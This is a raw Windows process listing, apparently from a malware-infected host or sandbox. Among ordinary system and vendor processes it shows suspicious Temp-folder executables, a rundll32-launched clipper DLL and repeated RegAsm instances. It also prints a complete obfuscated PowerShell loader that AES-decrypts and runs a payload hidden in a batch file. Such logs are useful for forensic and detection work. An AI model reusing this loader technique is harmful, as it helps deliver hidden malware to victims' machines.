Process List
Process List
exe, CommandLine:
===============
ID: 1172, Name: winlogon.exe, CommandLine:
===============
ID: 1228, Name: fontdrvhost.exe, CommandLine:
===============
ID: 1300, Name: dwm.exe, CommandLine:
===============
ID: 2644, Name: atieclxx.exe, CommandLine:
===============
ID: 7072, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 6544, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s CDPUserSvc
===============
ID: 6924, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s WpnUserService
===============
ID: 6868, Name: AsusDownLoadLicense.exe, CommandLine: C:\Windows\system32\
AsusDownLoadLicense.exe -asus2357start -hide
===============
ID: 3664, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 7432, Name: ctfmon.exe, CommandLine:
===============
ID: 7688, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
===============
ID: 7952, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 8208, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\
StartMenuExperienceHost.exe" -
ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
===============
ID: 8432, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 8636, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
===============
ID: 8764, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9992, Name: PhoneExperienceHost.exe, CommandLine: "C:\Program Files\
WindowsApps\Microsoft.YourPhone_1.23112.87.0_x64__8wekyb3d8bbwe\
PhoneExperienceHost.exe" -ComServer:Background -Embedding
===============
ID: 9468, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 10340, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 10888, Name: TextInputHost.exe, CommandLine: "C:\Windows\SystemApps\
MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -
ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
===============
ID: 11332, Name: SecurityHealthSystray.exe, CommandLine: "C:\Windows\System32\
SecurityHealthSystray.exe"
===============
ID: 11484, Name: tvnserver.exe, CommandLine: "C:\Program Files\TightVNC\
tvnserver.exe" -controlservice -slave
===============
ID: 11544, Name: AvastUI.exe, CommandLine: AvastUI.exe /nogui
===============
ID: 11568, Name: vgtray.exe, CommandLine: "C:\Program Files\Riot Vanguard\
vgtray.exe"
===============
ID: 11616, Name: OneDrive.exe, CommandLine: "C:\Users\User\AppData\Local\Microsoft\
OneDrive\OneDrive.exe" /background
===============
ID: 12032, Name: CCXProcess.exe, CommandLine: "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\CCXProcess.exe"
===============
ID: 12048, Name: node.exe, CommandLine: "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\libs\node.exe" "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\js\main.js"
===============
ID: 12056, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 12132, Name: RiotClientServices.exe, CommandLine: "C:\Riot Games\Riot Client\
RiotClientServices.exe" --launch-background-mode
===============
ID: 12236, Name: AdobeIPCBroker.exe, CommandLine: "C:\Program Files (x86)\Common
Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe" "-launchedbyvulcan-
12048 C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\libs\node.exe"
===============
ID: 1576, Name: RiotClientCrashHandler.exe, CommandLine: "C:\Riot Games\Riot
Client\RiotClientCrashHandler.exe" --no-rate-limit "--attachment=2024-01-28T23-18-
08_12132_Riot_Client.0.log=C:/Users/User/AppData/Local/Riot Games/Riot
Client/Logs/Riot Client Logs/2024-01-28T23-18-08_12132_Riot Client.0.log" "--
attachment=2024-01-28T23-18-08_12132_Riot_Client.log=C:/Users/User/AppData/Local/
Riot Games/Riot Client/Logs/Riot Client Logs/2024-01-28T23-18-08_12132_Riot
Client.log" "--attachment=__sentry-breadcrumb1=C:\Users\User\AppData\Local\Riot
Games\Riot Client\Crashes\Riot Client\db9afdf1-c7b1-4eb8-8410-376224f92530.run\
__sentry-breadcrumb1" "--attachment=__sentry-breadcrumb2=C:\Users\User\AppData\
Local\Riot Games\Riot Client\Crashes\Riot Client\db9afdf1-c7b1-4eb8-8410-
376224f92530.run\__sentry-breadcrumb2" "--attachment=__sentry-event=C:\Users\User\
AppData\Local\Riot Games\Riot Client\Crashes\Riot Client\db9afdf1-c7b1-4eb8-8410-
376224f92530.run\__sentry-event" "--database=C:\Users\User\AppData\Local\Riot
Games\Riot Client\Crashes\Riot Client" "--metrics-dir=C:\Users\User\AppData\Local\
Riot Games\Riot Client\Crashes\Riot Client"
--url=https://sentry.io:443/api/1339107/minidump/?
sentry_key=dc54709324504ab18ddf517a83f99e1a --initial-client-
data=0x378,0x3f8,0x3c8,0x384,0x3e0,0x6f64ed88,0x6f64ed98,0x6f64eda8
===============
ID: 12968, Name: TokenUtil.exe, CommandLine: "C:\Program Files\TrustEdgeID\
TokenUtil.exe"
===============
ID: 13048, Name: jusched.exe, CommandLine: "C:\Program Files (x86)\Common Files\
Java\Java Update\jusched.exe"
===============
ID: 13108, Name: NativeInstrumentsUsbAudioCpl.exe, CommandLine: "C:\Program Files\
Native Instruments\Komplete Audio Driver\W10_x64\NativeInstrumentsUsbAudioCpl.exe"
-hide
===============
ID: 13220, Name: RadeonSoftware.exe, CommandLine: "C:\Program Files\AMD\CNext\
CNext\Radeonsoftware.exe" atlogon
===============
ID: 4892, Name: cncmd.exe, CommandLine: "C:\Program Files\AMD\CNext\CNext\
cncmd.exe" watch 13220
===============
ID: 12700, Name: AMDRSServ.exe, CommandLine:
===============
ID: 7664, Name: amdow.exe, CommandLine:
===============
ID: 1188, Name: MSOSYNC.EXE, CommandLine: "C:\Program Files\Microsoft Office\
Office15\MsoSync.exe"
===============
ID: 2860, Name: ApplicationFrameHost.exe, CommandLine: C:\Windows\system32\
ApplicationFrameHost.exe -Embedding
===============
ID: 11460, Name: Microsoft.Media.Player.exe, CommandLine: "C:\Program Files\
WindowsApps\Microsoft.ZuneMusic_11.2312.7.0_x64__8wekyb3d8bbwe\
Microsoft.Media.Player.exe" -
ServerName:Microsoft.ZuneMusic.AppXr954g6gg1tvs748d5g67zt981dvpmnr6.mca
===============
ID: 8372, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9348, Name: svchost.exe, CommandLine: C:\Windows\System32\svchost.exe -k
UnistackSvcGroup
===============
ID: 12828, Name: dllhost.exe, CommandLine: C:\Windows\system32\DllHost.exe
/Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
===============
ID: 10116, Name: jucheck.exe, CommandLine: "C:\Program Files (x86)\Common Files\
Java\Java Update\jucheck.exe" -auto
===============
ID: 13648, Name: QtWebEngineProcess.exe, CommandLine: "C:\Program Files\AMD\CNext\
CNext\QtWebEngineProcess.exe" --type=utility --enable-
features=AllowContentInitiatedDataUrlNavigations,TracingServiceInProcess --disable-
features=BackgroundFetch,ConsolidatedMovementXY,DnsOverHttpsUpgrade,FormControlsRef
resh,MojoVideoCapture,PictureInPicture,SmsReceiver,UseSkiaRenderer,WebPayments,WebU
SB --lang=sr --service-sandbox-type=network --use-gl=angle --application-
name=Radeonsoftware --webengine-schemes=qrc:sLV --mojo-platform-channel-handle=5208
/prefetch:8
===============
ID: 4216, Name: AMDRSSrcExt.exe, CommandLine: "C:\Program Files\AMD\CNext\CNext\
AMDRSSrcExt.exe" fb28e830-7c29-4591-b2df-4e16275fa0d9 SOFTWARE\AMD\DVR\Overlays
===============
ID: 8616, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe -
Embedding
===============
ID: 9880, Name: TOTALCMD.EXE, CommandLine: "E:\Instalacije\Totalcmd\TOTALCMD.EXE"
===============
ID: 5152, Name: AvastUI.exe, CommandLine: "C:\Program Files\Avast Software\Avast\
AvastUI.exe" --type=gpu-process --field-trial-
handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --no-sandbox --disable-gpu-driver-bug-
workarounds --log-file="C:\Users\User\AppData\Roaming\Avast Software\Avast\log\
cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0 AppleWebKit/537.36
(KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium (0.0.0) (Windows
10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --force-wave-audio
--disable-software-rasterizer --no-sandbox --blacklist-accelerated-compositing --
disable-accelerated-2d-canvas --disable-accelerated-compositing --disable-
accelerated-layers --disable-accelerated-video-decode --blacklist-webgl --disable-
bundled-ppapi-flash --disable-flash-3d --enable-aggressive-domstorage-flushing --
enable-media-stream --disable-gpu --disable-webgl --disable-gpu-compositing --
allow-file-access-from-files=1 --pack_loading_disabled=1 --gpu-
preferences=SAAAAAAAAADgAABwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAA
AAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIA
AAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --log-file="C:\Users\User\AppData\
Roaming\Avast Software\Avast\log\cef_log.txt" --mojo-platform-channel-
handle=8416 /prefetch:2
===============
ID: 4712, Name: AvastUI.exe, CommandLine: "C:\Program Files\Avast Software\Avast\
AvastUI.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --
field-trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=utility --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=8608 /prefetch:8
===============
ID: 12392, Name: AvastUI.exe, CommandLine: "C:\Program Files\Avast Software\Avast\
AvastUI.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --
field-trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=none --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=8660 /prefetch:8
===============
ID: 9868, Name: AvastUI.exe, CommandLine: "C:\Program Files\Avast Software\Avast\
AvastUI.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-
trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=audio --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=10108 /prefetch:8
===============
ID: 12584, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 5060, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 13356, Name: UserOOBEBroker.exe, CommandLine: C:\Windows\System32\oobe\
UserOOBEBroker.exe -Embedding
===============
ID: 7412, Name: AdobeCollabSync.exe, CommandLine: "C:\Program Files\Adobe\Acrobat
DC\Acrobat\AdobeCollabSync.exe"
===============
ID: 3508, Name: AdobeCollabSync.exe, CommandLine: "C:\Program Files\Adobe\Acrobat
DC\Acrobat\AdobeCollabSync.exe" --type=collab-renderer --proc=7412
===============
ID: 9876, Name: DPService.exe, CommandLine:
===============
ID: 13096, Name: 1FF3.exe, CommandLine: C:\Users\User\AppData\Local\Temp\1FF3.exe
===============
ID: 4120, Name: build2.exe, CommandLine: "C:\Users\User\AppData\Local\f4728982-
a5a0-4742-973b-67968a402246\build2.exe"
===============
ID: 11312, Name: 9883.exe, CommandLine: C:\Users\User\AppData\Local\Temp\9883.exe
===============
ID: 10264, Name: explorhe.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
d887ceb89d\explorhe.exe"
===============
ID: 13132, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9576, Name: fz9YqoSLnCrtpx1uiHT8.exe, CommandLine: "C:\Users\User\AppData\
Local\Temp\jobA4aodo3bpwLTVri\fz9YqoSLnCrtpx1uiHT8.exe"
===============
ID: 12004, Name: CompPkgSrv.exe, CommandLine: C:\Windows\System32\CompPkgSrv.exe -
Embedding
===============
ID: 14608, Name: launcher.exe, CommandLine:
===============
ID: 14760, Name: opera_autoupdate.exe, CommandLine:
===============
ID: 14780, Name: opera_autoupdate.exe, CommandLine:
===============
ID: 11964, Name: btcgood.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
1000718001\btcgood.exe"
===============
ID: 3620, Name: 2024.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
1000721001\2024.exe"
===============
ID: 14900, Name: cmd.exe, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\
User\AppData\Local\Temp\file1.bat
===============
ID: 14928, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 10204, Name: conhost.exe, CommandLine: C:\Windows\system32\conhost.exe
===============
ID: 11480, Name: conhost.exe, CommandLine: conhost.exe
===============
ID: 9708, Name: file1.bat.exe, CommandLine: "file1.bat.exe" -noprofile -
windowstyle hidden -ep bypass -command $_CASH_qaVPf = [System.IO.File]::
('txeTllAdaeR'[-1..-11] -join '')('C:\Users\User\AppData\Local\Temp\
file1.bat').Split([Environment]::NewLine);foreach ($_CASH_fIZHT in $_CASH_qaVPf)
{ if ($_CASH_fIZHT.StartsWith(':: @')) { $_CASH_XqEBS = $_CASH_fIZHT.Substring(4);
break; }; };$_CASH_XqEBS =
[System.Text.RegularExpressions.Regex]::Replace($_CASH_XqEBS, '_CASH_', '');
$_CASH_AbGjb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')
($_CASH_XqEBS);$_CASH_xbtcQ = New-Object System.Security.Cryptography.AesManaged;
$_CASH_xbtcQ.Mode = [System.Security.Cryptography.CipherMode]::CBC;
$_CASH_xbtcQ.Padding =
[System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_xbtcQ.Key =
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')
('xnU+qixX8GxmNdtUiuJWKTS5382DUH1RFgNRqJG+Kzg=');$_CASH_xbtcQ.IV =
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')
('q4+6cHkazpcj3F4mKI+rYw==');$_CASH_KXHue = $_CASH_xbtcQ.CreateDecryptor();
$_CASH_AbGjb = $_CASH_KXHue.TransformFinalBlock($_CASH_AbGjb, 0,
$_CASH_AbGjb.Length);$_CASH_KXHue.Dispose();$_CASH_xbtcQ.Dispose();$_CASH_kEHGI =
New-Object System.IO.MemoryStream(, $_CASH_AbGjb);$_CASH_Kscdn = New-Object
System.IO.MemoryStream;$_CASH_Lfmtj = New-Object
System.IO.Compression.GZipStream($_CASH_kEHGI,
[IO.Compression.CompressionMode]::Decompress);$_CASH_Lfmtj.CopyTo($_CASH_Kscdn);
$_CASH_Lfmtj.Dispose();$_CASH_kEHGI.Dispose();$_CASH_Kscdn.Dispose();$_CASH_AbGjb =
$_CASH_Kscdn.ToArray();$_CASH_kHyYf = [System.Reflection.Assembly]::('daoL'[-1..-4]
-join '')($_CASH_AbGjb);$_CASH_ZMxsS = $_CASH_kHyYf.EntryPoint;
$_CASH_ZMxsS.Invoke($null, (, [string[]] ('')))
===============
ID: 3688, Name: rty25.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
rty25.exe"
===============
ID: 10724, Name: powershell.exe, CommandLine: C:\Windows\system32\
WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\User\AppData\Local\
Temp\FirstZ.exe" -Verb runAs
===============
ID: 1376, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 9024, Name: consent.exe, CommandLine:
===============
ID: 13452, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 13336, Name: explorer.exe, CommandLine: explorer.exe
===============
ID: 13392, Name: consent.exe, CommandLine:
===============
ID: 12588, Name: consent.exe, CommandLine:
===============
ID: 2208, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 12296, Name: sadsadsadsa.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
1000726001\sadsadsadsa.exe"
===============
ID: 12448, Name: olehps.exe, CommandLine: "C:\Users\User\AppData\Roaming\
configurationValue\olehps.exe"
===============
ID: 9584, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 7984, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 3364, Name: 7b0d48dbbf50fe239f1097f5d01c2a6d.exe, CommandLine:
===============
ID: 4148, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 10660, Name: LogonUI.exe, CommandLine:
===============
ID: 4636, Name: consent.exe, CommandLine:
===============
ID: 10740, Name: cmd.exe, CommandLine: C:\Windows\system32\cmd.exe /c choice /C
Y /N /D Y /T 3 & Del "C:\Users\User\AppData\Local\Temp\1000731001\moto.exe"
===============
ID: 11744, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 11840, Name: rundll32.exe, CommandLine: "C:\Windows\System32\rundll32.exe" C:\
Users\User\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
===============
ID: 2000, Name: choice.exe, CommandLine: choice /C Y /N /D Y /T 3
===============
ID: 8036, Name: powershell.exe, CommandLine:
===============
ID: 3644, Name: conhost.exe, CommandLine:
===============
ID: 8668, Name: qemu-ga.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
d887ceb89d\qemu-ga.exe"